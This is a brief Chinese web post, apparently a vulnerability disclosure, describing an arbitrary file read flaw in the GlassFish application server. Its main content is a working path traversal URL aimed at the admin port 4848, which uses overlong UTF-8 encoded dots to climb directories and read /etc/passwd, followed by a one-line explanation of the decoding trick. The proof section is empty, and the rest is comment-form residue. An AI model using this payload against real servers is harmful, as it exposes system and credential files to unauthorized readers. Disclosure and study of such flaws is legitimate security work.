应用服务器glassfish任意文件读取漏洞
一、详细说明:其中包括情报涉及的人员、利用点、利用方式等
漏洞详情:
| 1 |
http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
|
|---|
????????java语音中会把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符的"."(点)。
二、问题证明:
昵称
邮箱

匿名者 3575天前
最新评论